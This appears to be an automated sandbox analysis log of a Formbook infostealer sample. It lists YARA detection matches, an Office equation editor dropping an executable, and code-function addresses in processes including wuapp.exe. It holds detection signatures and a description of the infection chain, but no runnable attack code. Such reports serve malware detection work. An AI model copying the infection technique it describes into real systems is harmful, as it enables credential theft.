          Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403646
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B18905_2_013B1890
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013BC3BD5_2_013BC3BD
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013BA1845_2_013BA184
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013BB3F15_2_013BB3F1
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B9C125_2_013B9C12
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B96A05_2_013B96A0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B7E885_2_013B7E88
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_00110A415_2_00110A41
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041E1F56_2_0041E1F5
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041E9FF6_2_0041E9FF
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_004092206_2_00409220
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0040DBC06_2_0040DBC0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041DBBD6_2_0041DBBD
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_00402D896_2_00402D89
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041EF506_2_0041EF50
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041DF0D6_2_0041DF0D
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041E79A6_2_0041E79A
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_013BA1846_2_013BA184
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_013B18906_2_013B1890
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_013BC3BD6_2_013BC3BD
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_013BB3F16_2_013BB3F1
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_013B9C126_2_013B9C12
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_013B96A06_2_013B96A0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_013B7E886_2_013B7E88
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0086E0C66_2_0086E0C6
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0089D0056_2_0089D005
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008730406_2_00873040
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0088905A6_2_0088905A
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0086E2E96_2_0086E2E9
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_009112386_2_00911238
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_009163BF6_2_009163BF
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0086F3CF6_2_0086F3CF
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008963DB6_2_008963DB
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008723056_2_00872305
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008773536_2_00877353
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008BA37B6_2_008BA37B
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008814896_2_00881489
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008A54856_2_008A5485
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008F443E6_2_008F443E
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008AD47D6_2_008AD47D
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0088C5F06_2_0088C5F0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0087351F6_2_0087351F
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008B65406_2_008B6540
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008746806_2_00874680
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0087E6C16_2_0087E6C1
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_009126226_2_00912622
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008BA6346_2_008BA634
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008F579A6_2_008F579A
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0087C7BC6_2_0087C7BC
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008A57C36_2_008A57C3
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EAE0C68_2_01EAE0C6
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F2D06D8_2_01F2D06D
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EB30408_2_01EB3040
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EC905A8_2_01EC905A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EDD0058_2_01EDD005
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EAF3CF8_2_01EAF3CF
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01ED63DB8_2_01ED63DB
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F563BF8_2_01F563BF
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EFA37B8_2_01EFA37B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EB73538_2_01EB7353
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EB23058_2_01EB2305
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EAE2E98_2_01EAE2E9
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F512388_2_01F51238
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F305E38_2_01F305E3
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01ECC5F08_2_01ECC5F0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EF65408_2_01EF6540
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EB351F8_2_01EB351F
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EC14898_2_01EC1489
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EE54858_2_01EE5485
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EED47D8_2_01EED47D
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F3443E8_2_01F3443E
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EE57C38_2_01EE57C3
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EBC7BC8_2_01EBC7BC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F3579A8_2_01F3579A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EBE6C18_2_01EBE6C1
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EB46808_2_01EB4680
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F526228_2_01F52622
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EFA6348_2_01EFA634
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EC69FE8_2_01EC69FE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EB29B28_2_01EB29B2
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5098E8_2_01F5098E
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F359558_2_01F35955
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F3394B8_2_01F3394B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F4F8EE8_2_01F4F8EE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F2F8C48_2_01F2F8C4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01ED286D8_2_01ED286D
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EBC85C8_2_01EBC85C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F3DBDA8_2_01F3DBDA
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5CBA48_2_01F5CBA4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01ED7B008_2_01ED7B00
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F63A838_2_01F63A83
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F4FDDD8_2_01F4FDDD
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EBCD5B8_2_01EBCD5B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EE0D3B8_2_01EE0D3B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F22FDC8_2_01F22FDC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F4CFB18_2_01F4CFB1
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EDDF7C8_2_01EDDF7C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EC0F3F8_2_01EC0F3F
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01ECEE4C8_2_01ECEE4C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EE2E2F8_2_01EE2E2F
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012E1BE8_2_0012E1BE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012E1EB8_2_0012E1EB
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_001192208_2_00119220
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012E79A8_2_0012E79A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012E9FF8_2_0012E9FF
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0011DBC08_2_0011DBC0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00112D908_2_00112D90
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00112D898_2_00112D89
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012DEF78_2_0012DEF7
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00112FB08_2_00112FB0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: String function: 008DF970 appears 41 times
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: String function: 008B373B appears 112 times
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: String function: 008B3F92 appears 59 times
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: String function: 013B4599 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: String function: 0086DF5C appears 59 times
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: String function: 013B2400 appears 54 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01EADF5C appears 121 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01F1F970 appears 84 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01EF373B appears 245 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01EF3F92 appears 132 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01EAE2A8 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041A2D0 NtCreateFile,6_2_0041A2D0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041A380 NtReadFile,6_2_0041A380
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041A400 NtClose,6_2_0041A400
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041A4B0 NtAllocateVirtualMemory,6_2_0041A4B0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041A2CA NtCreateFile,6_2_0041A2CA
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041A28A NtCreateFile,6_2_0041A28A
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041A4AA NtAllocateVirtualMemory,6_2_0041A4AA
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008600C4 NtCreateFile,LdrInitializeThunk,6_2_008600C4
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_00860048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_00860048
